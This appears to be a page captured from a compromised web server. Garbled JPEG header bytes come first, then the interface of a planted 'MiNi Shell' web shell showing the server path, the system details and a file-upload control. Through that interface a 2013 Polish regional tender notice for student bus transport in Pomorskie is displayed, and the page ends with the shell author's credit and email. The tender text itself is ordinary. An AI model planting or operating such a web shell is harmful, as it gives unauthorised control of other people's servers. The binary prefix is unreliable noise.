JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130218/66602-N-2013.html

<p class="kh_header"><b>Gdańsk: ŚWIADCZENIE USŁUGI TRANSPORTU DLA UCZNIÓW GIMNAZJUM I SZKOŁY
PONADGIMNAZJALNEJ Z ZAPEWNIENIEM OPIEKI W CZASIE PRZEJAZDU.</b><br>
<b>Numer ogłoszenia: 66602 - 2013; data zamieszczenia: 18.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorząd Województwa Pomorskiego , ul. Okopowa 21/27, 80-810 Gdańsk, woj. pomorskie, tel. 058 3261555, faks 058 3261556.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pomorskie.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUGI TRANSPORTU DLA UCZNIÓW GIMNAZJUM I SZKOŁY
PONADGIMNAZJALNEJ Z ZAPEWNIENIEM OPIEKI W CZASIE PRZEJAZDU..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa zorganizowania transportu dla uczniów gimnazjum i szkoły ponadgimnazjalnej z zapewnieniem opieki w czasie przejazdu. Zamówienie jest realizowane w związku z realizacją spotkań akademickich w ramach projektu pn. Pomorskie - dobry kurs na edukację. Wspieranie uczniów o szczególnych predyspozycjach w zakresie matematyki, fizyki i informatyki, który jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Priorytet IX Programu Operacyjnego Kapitał Ludzki 2007 - 2013. W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązuje się do:
1)podstawienia pojazdu wraz z kierowcą, zgodnie z harmonogram zleceń na wykonanie usługi przewozu autokarem, zwanym dalej HARMONOGRAMEM,
2)zapewnienia opiekunów dla uczniów na czas przejazdu autokarem na spotkania akademickie i z powrotem, 
3)zapewnienia pojazdu spełniającego parametry opisane w SIWZ i wymagania techniczne określone przepisami prawa oraz posiadającego aktualne ubezpieczenie OC i NNW. 
4)telefonicznego informowania Zamawiającego o każdym opóźnieniu powyżej 15 minut w podstawieniu pojazdu,
5)zapewnienia bezpiecznego przewozu osób oraz ich bagażu, w szczególności świadczenia usług przez osoby posiadające odpowiednie kwalifikacje do przewozu osób,
6)każdorazowego ustalenia trzeźwości kierującego pojazdem, a przypadku stwierdzenia, że stan kierowcy wskazuje na spożycie alkoholu lub środków odurzających, natychmiastowego odsunięcia go od wykonywania pracy,
7)zapewnienia, na własny koszt, pojazdu zastępczego spełniającego warunki wymienione w SIWZ, w przypadku wystąpienia w czasie świadczenia usługi zdarzeń uniemożliwiających jej kontynuacje dotychczasowym pojazdem.
2.Wykonawca będzie świadczył usługę polegającą na przewozie uczniów na spotkania akademickie odbywające się na Uniwersytecie Gdańskim, na terenie województwa pomorskiego czterema trasami opisanymi poniżej (zwanymi dalej trasami):
a)1 TRASA: Słupsk, Lębork, Wejherowo, Reda, Gdańsk i powrót tą samą trasą. Autokar musi dowieźć uczniów na godzinę 10:00, po czym odebrać ich o godzinie 17:00 i odwieźć tą sama trasą.
b)2 TRASA: Bytów, Kościerzyna, Kartuzy, Gdańsk i powrót tą samą trasą. Autokar musi dowieźć uczniów na godzinę 10:00, po czym odebrać ich o godzinie 17:00 i odwieźć tą sama trasą.
c)3 TRASA: Człuchów, Chojnice, Starogard Gdański, Tczew, Pruszcz Gdański, Gdańsk i powrót tą samą trasą. Autokar musi dowieźć uczniów na godzinę 10:00, po czym odebrać ich o godzinie 17:00 i odwieźć tą sama trasą.
d)4 TRASA: Kwidzyn, Sztum, Malbork, Nowy Dwór Gdański, Gdańsk i powrót tą samą trasą. Autokar musi dowieźć uczniów na godzinę 10:00, po czym odebrać ich o godzinie 17:00 i odwieźć tą sama trasą.
W każdej z wyżej wymienionych miejscowości autokar będzie zobowiązany zatrzymać się i zabrać uczniów, którzy będą uczestniczyć w spotkaniach akademickich danego dnia. Dokładne miejsca Przystanków zostaną ustalone w ciągu 7 dni od daty zawarcia umowy.
3.Wykonawca gwarantuje bezpieczeństwo osób i mienia podczas wykonywania usług przewozu. Zamawiający nie ponosi odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu, w wyniku których nastąpi uszkodzenie ciała, śmierć czy szkoda materialna spowodowana działalnością Wykonawcy.
4.Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo przewożonych osób oraz jest zobowiązany do ubezpieczania pasażerów i mienia od wszelkich szkód powstałych podczas przewozu i pozostających w związku z przewozem.
5.Wykonawca oznaczy każdy z autokarów napisem: Zdolni z Pomorza. Jeżeli autokar posiada wyświetlacz na przedniej szybie, hasło to powinno być na nim umieszczone. W przypadku braku możliwości ustawienia takiego napisu na wyświetlaczu Wykonawca będzie zobowiązany do umieszczenia tabliczki z tym hasłem w widocznym miejscu w taki sposób, aby uczniowie mogli rozpoznać, iż nadjeżdżający autokar przewozi uczniów z projektu Zdolni z Pomorza. 

6.Wykonawca musi realizować usługi przewozu zgodnie z przepisami prawa, a w szczególności zgodnie  z ustawą z dnia 6 września 2001 r. o transporcie drogowym (j.t. Dz. U. z 2012 r. poz. 1265, z późn. zm.) oraz ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (j.t. Dz. U. z 2012 r. poz. 1137, z późn. zm.).
7.Wykonawca zapewni transport oraz opiekunów dla uczniów na czas przejazdu na każdej z wyżej wymienionych tras. Liczba opiekunów oraz ich kwalifikacje muszą być zgodne z wymogami opisanymi w rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r. Nr 12, poz. 67, z późn. zm.). Nie później niż na 24 godziny przed każdym przejazdem, Wykonawca przekaże listę opiekunów Zamawiającemu, którzy będą danego dnia opiekować się uczniami w autokarach. Lista powinna zawierać imię i nazwisko oraz numer telefonu komórkowego opiekuna. Opiekunowie będą odpowiedzialni za:
1)weryfikację tożsamości uczniów wsiadających do autokaru z listą przekazaną przez Zamawiającego, na podstawie dowolnego dokumentu tożsamości,
2)odebranie uczniów po skończonych spotkaniach akademickich i dopilnowanie, aby  wsiedli do autokaru w drogę powrotną. 
Zamawiający przekaże listę uczniów, którzy będą mogli skorzystać z transportu autokarami, nie później niż na 18 godzin przed terminem przejazdu. 
8.Na każdą trasę, jednego dnia, Wykonawca zapewni 1 lub 2 autokary turystyczne dalekobieżne minimum 45 osobowe. W związku z powyższym, w ciągu jednego dnia, Wykonawca będzie musiał dysponować maksymalnie 8 autokarami. O dokładnej liczbie autokarów Zamawiający powiadomi najpóźniej na 3 dni przed datą każdego spotkania akademickiego. W związku z zdarzeniami losowymi tj.: wypadek na drodze, stłuczka, awaria czy innymi nieprzewidzianymi czynnikami zewnętrznymi, Wykonawca zapewni zapasowy autokar, który w razie konieczności dojedzie do grupy uczniów i zastąpi niesprawny autokar.
9.Wykonawca musi zapewnić przewożonym osobom odpowiednie warunki bezpieczeństwa i higieny poprzez: utrzymanie pojazdów w czystości i porządku, klimatyzację w każdym pojeździe, przestrzeganie przepisów przeciwpożarowych i BHP, posiadanie ubezpieczenia pojazdów i osób na czas przewozu z tytułu szkód, które mogą wyniknąć w związku z wykonywaniem zamówienia. 
10.Zamawiający przewiduje 9 spotkań akademickich w terminach od 09 marca do 28 czerwca 2013 r. (głównie soboty), co oznacza 9 wyjazdów na każdą z tras.  W zależności od harmonogramu spotkań akademickich Zamawiający przekaże Wykonawcy HARMONOGRAM najpóźniej w ciągu trzech (3) dni od daty zawarcia umowy. W wyniku zdarzeń losowych Zamawiający wymaga, aby Wykonawca był przygotowany na realizację dodatkowego jednego (1) przejazdu. Wszelkie koszty związane z dodatkowym przejazdem leżą po stronie Wykonawcy, który w cenie oferty uwzględni powyższe wymaganie. 
11.W związku z tym, że ilość zamawianych przejazdów uzależniona jest od bieżących potrzeb, Zamawiający zastrzega, że ilość zamawianych przejazdów podana w ofercie jest ilością orientacyjną, podaną w celu określenia maksymalnej wartości zamówienia, ustalenia cen jednostkowych, porównania ofert i wyboru najkorzystniejszej oferty. Podane ilości przejazdów ulegają zmniejszeniu, gdy:
1)w czasie realizacji spotkań akademickich, zostaną zorganizowane zajęcia dla mniejszej liczby przedmiotów lub grup uczniów niż maksymalna,
2)w wyniku rejestracji uczniów na spotkania akademickie stwierdzi się, że z terenów przez którą przebiega dana trasa, zgłosiła się mniejsza niż przewidywana liczba uczniów,
3)spotkania akademickie dla danego przedmiotu lub grupy uczniów nie odbędą się.   
W razie zmniejszenia liczby przejazdów wynagrodzenie Wykonawcy będzie płatne według rzeczywistej liczby wykonanych przejazdów - z zastrzeżeniem, że minimalna, gwarantowana przez Zamawiającego liczba przejazdów wynosi pięć (5). Wykonawca zrzeka się prawa dochodzenia od Zamawiającego jakichkolwiek roszczeń, w tym roszczeń odszkodowawczych, z tytułu powstania różnicy pomiędzy maksymalną kwotą wynagrodzenia, a kwotą wynagrodzenia Wykonawcy uwzględniającą zmniejszenie liczby przejazdów.
12.Wykonawca odpowiada za sprawność techniczną pojazdów służących do wykonania usług stanowiących przedmiot zamówienia. Zamawiający wymaga, aby pojazdy służące do wykonania usług  spełniały wszelkie wymagania techniczne i bezpieczeństwa zgodnie z obowiązującymi przepisami prawa.
13.Usługi winny być świadczone środkami transportu prowadzonymi przez osoby mające odpowiednie uprawnienia do świadczenia tych usług, ze szczególną starannością i troską o życie i zdrowie pasażerów.
14.Osoby będą przewożone pojazdami przystosowanymi do ich przewożenia na miejscach siedzących i tylko takie miejsca mogą być uznane za spełniające warunki (nie przewiduje się przewozu na stojąco).
15.Wykonawca winien dysponować taką ilością środków transportu, by zapewnić jednorazowy i w tym samym czasie, przewóz osób zgodnie ze zleceniem Zamawiającego.
16.Wykonawca zobowiązany jest do ponoszenia wszystkich kosztów związanych z eksploatacją  i używaniem pojazdów własnych, w tym również dodatkowych kosztów związanych z awarią pojazdów. 
17.W przypadku awarii środka transportowego (z jakiejkolwiek przyczyny) Wykonawca zapewni niezwłocznie zastępczy środek transportu spełniający wszystkie warunki zamawiającego, w taki sposób, aby nie powodować opóźnień czasowych oraz poniesie pełną odpowiedzialność z tego tytułu. 
18.Zamawiający zastrzega sobie prawo do modyfikacji HARMONOGRAMU bądź rezygnacji z zamówionego przejazdu jednego lub większej liczby autokarów - z uwzględnieniem następujących warunków:
1) Informację o modyfikacji HARMONOGRAMU Zamawiający przekaże Wykonawcy faksem, e-mailem bądź telefonicznie najpóźniej na 3 dni przed planowanym przejazdem, 
2) Informację o rezygnacji z przejazdu jednego lub większej liczby autokarów Zamawiający przekaże Wykonawcy faksem, e-mailem, lub telefonicznie nie później niż 24 godzin przed planowanym świadczeniem usługi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.17.10.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena wykazania spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których mowa w rozdz. VI ust.1 pkt 2  oraz oświadczenia, o którym mowa w rozdz. VI ust.1 pkt 1 (wzór stanowi załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku. Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę  oświadczenia, którego wzór stanowi załącznik nr 2 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku. Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę  oświadczenia, którego wzór stanowi załącznik nr 2 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku. Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę  oświadczenia, którego wzór stanowi załącznik nr 2 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż warunek ten został spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 50.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany zawartej umowy będą wymagały pisemnego aneksu pod rygorem nieważności. 
2.	W przypadku wygaśnięcia ważności polisy od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej w trakcie realizacji zamówienia Wykonawca jest zobowiązany do jej przedłużenia na okres obejmujący realizację zadania.
3.Stosownie do treści przepisu art. 144 ustawy Prawo Zamówień Publicznych Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy w zakresie: 
1)	któregokolwiek z terminów, o których mowa w Umowie, lub
2)	warunków i terminów płatności wynagrodzenia przysługującego Wykonawcy
4.	Każda ze zmian, o której mowa w ust. 3, może nastąpić w przypadku wystąpienia siły wyższej, przez którą rozumie się zdarzenia, które łącznie spełniają trzy przesłanki: mają charakter zewnętrzny, są niemożliwe do przewidzenia i są niemożliwe do zapobieżenia 
5. Zmiany, o których mowa w ust. 3 pkt 1 mogą nastąpić jedynie w przypadku przedłużenia terminu zakończenia postępowania o udzielenie niniejszego zamówienia lub wniesienia przez wykonawcę(wykonawców) odwołania(odwołań) do Prezesa Krajowej Izby Odwoławczej od niezgodnej z przepisami u.p.z.p. czynności Zamawiającego podjętej w postępowaniu o udzielenie zamówienia publicznego, w wyniku którego ma zostać zawarta Umowa.
6.	Zmiany, o których mowa w ust. 3 pkt 2, mogą wystąpić w przypadku zmian powszechnie obowiązujących przepisów prawa, które wystąpią w okresie obowiązywania Umowy. 
7.	Wszelkie zmiany wprowadzane do niniejszej umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności z art. 140 ust. 3 ustawy Prawo Zamówień Publicznych oraz zasad ogólnych rządzących tą ustawą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pomorskie.eu/pl/bip/umwp/zamowienia/zamowienia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Pomorskiego
80-810 Gdańsk, ul. Okopowa 21/27 
pok. 133h.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2013 godzina 09:30, miejsce: Urząd Marszałkowski Województwa Pomorskiego
80-810 Gdańsk, ul. Okopowa 21/27 
pok 4a ( Kancelaria Ogólna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com